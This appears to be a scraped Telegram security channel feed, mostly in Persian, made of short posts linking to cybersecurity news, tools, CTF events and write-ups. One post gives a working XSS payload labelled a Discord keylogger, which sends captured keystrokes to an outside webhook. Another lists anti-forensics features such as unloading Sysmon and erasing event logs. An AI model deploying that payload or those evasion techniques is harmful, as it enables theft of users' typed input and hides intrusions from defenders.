⭕️ شرکت آروان کلود و پرس تی وی در لیست تحریم های اروپا قرار گرفتند.
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
لیست و جزییات کامل :
https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN
@securation
👍30🎉11👎7
⭕️ناتو خود را برای یک "جنگ سایبری" آماده میکند.
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
🤩39😁6👍5😱5
⭕️ درحالی که توی کانادا مسابقات Pwn2Own 2022 در حال امادگی و برگزاری هست ، اینجا توی ایران یک مشت گاو نشستن روی کابل اینترنت فقط دنبال فیلتر کردن و قطع کانکشن های ارتباطی هستن.
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
Zero Day Initiative
Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
Welcome to Pwn2Own Toronto 2022! his year marks the 10th anniversary of our consumer-focused version of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 26 contestants and teams attempting…
😢35👍9😁2👎1🤩1
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
Reuters
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
The forecast represents how some are betting the AI tech will go far beyond splashy and sometimes flawed public demos.
👍6🔥1
⭕️ نامردا رفتن به اسم من یه بدافزار موبایلی نوشتن که تارگت هاش حسابهای بانکی افراد هست:(
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
Cyble
Godfather Malware Returns: Targeting Banking Users And Online Security
The Godfather malware is back, specifically targeting banking users. Learn how this threat works and what steps you can take to protect your online banking security.
😁32👎8😢4👍3😱2
⭕️XSS Payload
Discord Keylogger
usage:
@securation
Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
#discord #xss #bugbounty@securation
🔥20👎2👍1
ASIS CTF Finals 2022 (1725)
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
ctftime.org
ASIS CTF Finals 2022
ASIS CTF Finals 2022 CTF event
🔥13👎3😢1
Google Releases Open-Source Vulnerability Scanning Tool
https://www.infoq.com/news/2022/12/google-osv-scanner/
https://www.infoq.com/news/2022/12/google-osv-scanner/
InfoQ
Google Releases Open-Source Vulnerability Scanning Tool
Google has released OSV-Scanner, an open-source front-end interface to the Open Source Vulnerability (OSV) database. The OSV database is a distributed, open-source database that stores vulnerability information in the OSV format. The OSV-Scanner assesses…
😢6👍1
⭕️linWinPwn
#ad #enum
@securation
bash script that automates a number of Active Directory Enumeration and Vulnerability checks
https://github.com/lefayjey/linWinPwn#ad #enum
@securation
GitHub
GitHub - lefayjey/linWinPwn: linWinPwn is a bash script that streamlines the use of a number of Active Directory tools
linWinPwn is a bash script that streamlines the use of a number of Active Directory tools - lefayjey/linWinPwn
👍11
⭕️RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
👍9
⭕️ Offensive Security & Reverse Engineering Course
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
🤩6👍1
⭕️ اینجا قبلا درمورد نشر و نصب انواع بدافزارها بخاطر افزایش فیلترینگ و سانسور و مراجعه مردم به نصب انواع VPN های ناامن مطلبی نوشته بودم.
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
👍41😱4👎2🔥1😢1🤩1
⭕️از مهم ترین اقدامات Pentest و Redteam تکنیک های Anti Forensic است، ابزاری اخیرا منتشر شده که تکنیک های زیر را در بر میگیرد:
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
GitHub
GitHub - PaulNorman01/Forensia: Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.
Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase. - PaulNorman01/Forensia
👍13🔥1😢1
⭕️ اگر به موضوعات kiosk breakout و atm hacking علاقه مند هستید پیشنهاد میکنم نظاره گر این مقاله باشید.
مقاله زیر حول محورهای مختلفی مانند:
ATM Internals
Insufficient physical security
Insufficient configuration of the system and peripheral devices
Insufficient network security
و توصیه های Hardening این حملات است.
https://blog.nviso.eu/2023/01/10/malware-based-attacks-on-atms-a-summary/
#redteam #kioskbreakout #atmhacking
@securation
مقاله زیر حول محورهای مختلفی مانند:
ATM Internals
Insufficient physical security
Insufficient configuration of the system and peripheral devices
Insufficient network security
و توصیه های Hardening این حملات است.
https://blog.nviso.eu/2023/01/10/malware-based-attacks-on-atms-a-summary/
#redteam #kioskbreakout #atmhacking
@securation
NVISO Labs
Malware-based attacks on ATMs – A summary
Introduction Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics. ATMs have been robbed by crimin…
👍10😢3👎2🔥2😱1
⭕️ در پروسه تحلیل ترافیک و Network Forensic ما از ابزار های مختلفی استفاده میکنیم.
گاهی ابزار هایی تولید میشود که کار را راحت کرده و ترکیبی از ابزار های مختلف خواهد بود.
ابزار brim security یک ابزار تحلیل ترافیک تحتِ وب است که خروجی ترافیک wireshark که فایل های pcap هستند را به zeek داده و خروجی تحلیل را به ما نشان میدهد.
همچنین میتوان از ابزار های خوب مانند omnipeek
https://kifarunix.com/analyze-network-traffic-using-brim-security/
#Forensic #AnalyzeNetwork #blueteam
@securation
گاهی ابزار هایی تولید میشود که کار را راحت کرده و ترکیبی از ابزار های مختلف خواهد بود.
ابزار brim security یک ابزار تحلیل ترافیک تحتِ وب است که خروجی ترافیک wireshark که فایل های pcap هستند را به zeek داده و خروجی تحلیل را به ما نشان میدهد.
همچنین میتوان از ابزار های خوب مانند omnipeek
نیز برای این کار استفاده کرد.https://kifarunix.com/analyze-network-traffic-using-brim-security/
#Forensic #AnalyzeNetwork #blueteam
@securation
kifarunix.com
Analyze Network Traffic Using Brim Security - kifarunix.com
In this tutorial, you will learn how you can analyze network traffic using Brim security tool. Brim is an open source desktop application that can be used to
👍14